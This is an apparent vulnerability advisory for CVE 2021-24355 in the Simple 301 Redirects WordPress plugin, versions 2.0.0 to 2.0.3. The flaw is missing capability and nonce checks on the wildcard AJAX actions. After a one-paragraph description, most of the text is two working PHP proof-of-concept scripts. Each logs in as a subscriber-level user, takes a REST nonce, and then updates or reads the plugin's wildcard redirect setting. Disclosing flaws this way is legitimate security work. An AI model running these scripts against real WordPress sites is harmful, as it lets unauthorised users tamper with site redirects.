Simple 301 Redirects by BetterLinks – 2.0.0 – 2.0.3 – Update and Retrieve Wildcard Value | CVE 2021-24355

Description

In the plugin, the lack of capability checks and insufficient nonce check on the AJAX actions, simple301redirects/admin/get_wildcard and simple301redirects/admin/wildcard, made it possible for authenticated users to retrieve and update the wildcard value for redirects.

Proof of Concept

<?php

// Settings
$siteurl = $argv[1];
$wp_user = $argv[2];
$wp_pass = $argv[3];

echo 'Logging in!';

// 1) Log in as sub+
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $siteurl . '/wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'log'        => $wp_user,
    'pwd'        => $wp_pass,
    'rememberme' => 'forever',
    'wp-submit'  => 'Log+In',
]);
$output = curl_exec($ch);
curl_close($ch);

echo 'Getting REST API Nonce!';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $siteurl . '/wp-admin/admin-ajax.php?action=rest-nonce');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

//Import Nonce
preg_match('/([^"]+)/', $content, $matches);
$restnonce = $matches[1];
echo $restnonce;

echo 'wildcard!';
//Wildcard
$ch = curl_init();
curl_setopt( $ch, CURLOPT_URL, $siteurl . '/wp-admin/admin-ajax.php' );
curl_setopt( $ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13' );
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, true );
curl_setopt( $ch, CURLOPT_POST, true );
curl_setopt( $ch, CURLOPT_POSTFIELDS, [
    'action' => 'simple301redirects/admin/wildcard',
    'security' => $restnonce,
    'toggle' => 'I have updated this setting!',
] );
$output = curl_exec($ch);
curl_close($ch);
print($output)

?>



<?php

// Settings
$siteurl = $argv[1];
$wp_user = $argv[2];
$wp_pass = $argv[3];

echo 'Logging in!';

// 1) Log in as sub+
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $siteurl . '/wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'log'        => $wp_user,
    'pwd'        => $wp_pass,
    'rememberme' => 'forever',
    'wp-submit'  => 'Log+In',
]);
$output = curl_exec($ch);
curl_close($ch);

echo 'Getting REST API Nonce!';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $siteurl . '/wp-admin/admin-ajax.php?action=rest-nonce');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

//Import Nonce
preg_match('/([^"]+)/', $content, $matches);
$restnonce = $matches[1];
echo $restnonce;

echo 'Get wildcard!';
//Get wildcard
$ch = curl_init();
curl_setopt( $ch, CURLOPT_URL, $siteurl . '/wp-admin/admin-ajax.php' );
curl_setopt( $ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13' );
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, true );
curl_setopt( $ch, CURLOPT_POST, true );
curl_setopt( $ch, CURLOPT_POSTFIELDS, [
    'action' => 'simple301redirects/admin/get_wildcard',
    'security' => $restnonce,
] );
$output = curl_exec($ch);
curl_close($ch);
print($output)
?>